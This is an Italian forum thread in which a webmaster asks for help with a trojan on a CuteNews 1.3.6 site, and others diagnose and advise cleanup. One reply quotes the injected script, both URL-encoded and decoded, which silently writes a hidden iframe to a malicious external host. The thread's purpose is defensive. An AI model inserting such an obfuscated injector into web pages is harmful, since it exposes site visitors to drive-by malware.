Aiuto il mio sito è infettato da un Trojan

Ciao a tutti. Non riesco a capire perché il mio sito web è infettato da un Trojan...
Quando cerco di accedere al sito Avast! blocca l'accesso.
Questo è quello che riporta il programma:

Nome malware: JS:Agent-AV[Trj]
Tipo di malvare: Cavallo di *****

Come devo fare per togliere il virus dal mio sito?
Vi prego aiutatemi...

Dai un sguardo a http://forum.it.altervista.org/basi-...i-cattivi.html

Ciao

Usi per caso qualche contatore visite esterno o simili?
In questo caso: http://forum.it.altervista.org/basi-...i-cattivi.html


Ciao!

Non uso servizi esterni per il mio sito...

[darkwolf]

Sono entrato di forza nella tua pagina (l'antivirus mi impediva di farlo).
http://www.avira.com/it/threats/sect...iframe.dp.html
Nel codice vedo parecchi:

Codice:

<script>eval(unescape("%77%69%6e %64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f% 63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65 %20%6e%61%6d%65%3d%33%38%63%64%35%30%39%35%32 %34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%73%65%6f%75%70% 64%61%74%65%73%2e%69%6e%66%6f%2f%66%6f%72%75%6d%2f%69%6e%64%65 %78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d% 61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%33%38%32%29%2b%27%36% 35%30%33%64%63%35%39%5c%27%20%77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68 %74%3d%33%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e %27%29")); </script>

Sembra sia stato inserito ovunque nella pagina (è ripetuto parecchie volte).
Questo quanto ottenuto:

Codice:

<script>eval(unesca pe("window.status='Don e';document.write('<if rame name=38cd5 09524 src=\'http://seoupdates.info/forum/index.php?'+Math.r ound(Math.random()*22382)+'6503d c59\' width=589 height=38 style=\'display: none\'></iframe>')")); </script>

Il sito indicato è chiaramente maligno (firefox lo rileva pericoloso)
http://safebrowsing.clients.google.c...orum/index.php
PS: Non riesco a capire se il tuo sito è un CMS o altro...

darkwolf utilizzo CuteNews 1.3.6 come cms. E' quello che danneggia il il sito? Come posso risolvere questo problema? Devo riparare il file? Se sì, come devo farlo?

[darkwolf]

Adesso siamo a CuteNews.1.4.6!!!
Bisogna tenere aggiornati gli script altrimenti succedono casini....
Direi di iniziare a scaricarti il sito intero e poi cercare quelle stringhe nei files (template probabilmente)
Fatto ciò non esitare ad aggiornare CuteNews, inoltre assicurati di avere il pc pulito.
Dopo essere entrato nel tuo sito (sapevo sarebbe accaduto ma non è un problema) ho parecchi malware (inattivi al momento) nel sistema
Purtroppo più di così non saprei come aiutarti (eccetto entrare via ftp nel tuo account e ripulirti il sito).
Edit: non conosco il caso specifico ma lo script oltre ad essere nel template potrebbe essere anche negli articoli
(in tal caso bisognerà agire anche sui file del database).
-
http://www.google.it/search?source=i...n+Google&meta=

Quindi devo per forza aggiornare lo script... il fatto è che ho scelto la 1.3.6 perché in basso non esce la firma del cms, ovvero "Powered by Cutenews" era solo per questione di comodità grafica...
Inizialmente però non mi dava problemi, non capisco come si è aggiunto al sito...

Ciao a tutti!
Il problema di quando scarico le pagine dal sito al pc è che Avast! mi elimina le pagine web considerandole virus, quindi l'intero sito non riesco a scaricarlo non permettendomi dunque di correggere il codice... mi chiedevo... non è possibile resettare lo spazio web? Così a spazio web inserito, cerco di inserirlo di nuovo. Grazie per ogni eventuale risposta.

[dementialsite]

Se proprio vuoi, puoi farlo manualmente da solo:
- accedi al tuo sito tramite FTP (per sapere come fare cerca nel forum il topic "Connessione FTP"), ed elimina tutti i file in esso presenti
- accedi poi a phpMyAdmin e svuota il database, eliminando una per una tutte le tabelle presenti

Inutile dire che così tutti i contenuti saranno irrimediabilmente persi: se non hai pensato ad un backup, non potrai far altro che reinstallare una versione "vergine" (e, possibilmente, più aggiornata) del tuo CMS...

Stammi bene...